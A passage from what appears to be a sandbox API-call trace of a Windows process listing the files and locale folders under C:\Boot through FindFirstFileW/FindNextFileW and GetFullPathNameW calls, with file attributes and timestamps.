ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0039.118] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0039.118] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0039.118] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0039.118] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0039.118] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0039.118] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0039.118] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0039.118] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.119] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0039.119] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0039.119] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0039.119] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0039.119] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0039.119] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0039.119] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0039.120] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0039.120] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0039.120] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0039.120] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0039.120] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0039.120] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0039.120] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0039.121] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0039.121] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0039.121] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0039.121] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0039.121] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0039.121] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0039.121] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0039.121] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0039.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0039.122] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD", lpFilePart=0x0) returned 0xb [0039.122] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0039.122] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1", lpFilePart=0x0) returned 0x10 [0039.122] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2", lpFilePart=0x0) returned 0x10 [0039.122] GetFullPathNameW (in: lpFileName="C:\\Boot\\BOOTSTAT.DAT", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BOOTSTAT.DAT", lpFilePart=0x0) returned 0x14 [0039.122] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe", lpFilePart=0x0) returned 0x13 [0039.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0039.122] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0039.122] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0039.122] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.123] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.123] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0039.123] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0039.123] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0039.123] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0039.123] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0039.123] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, 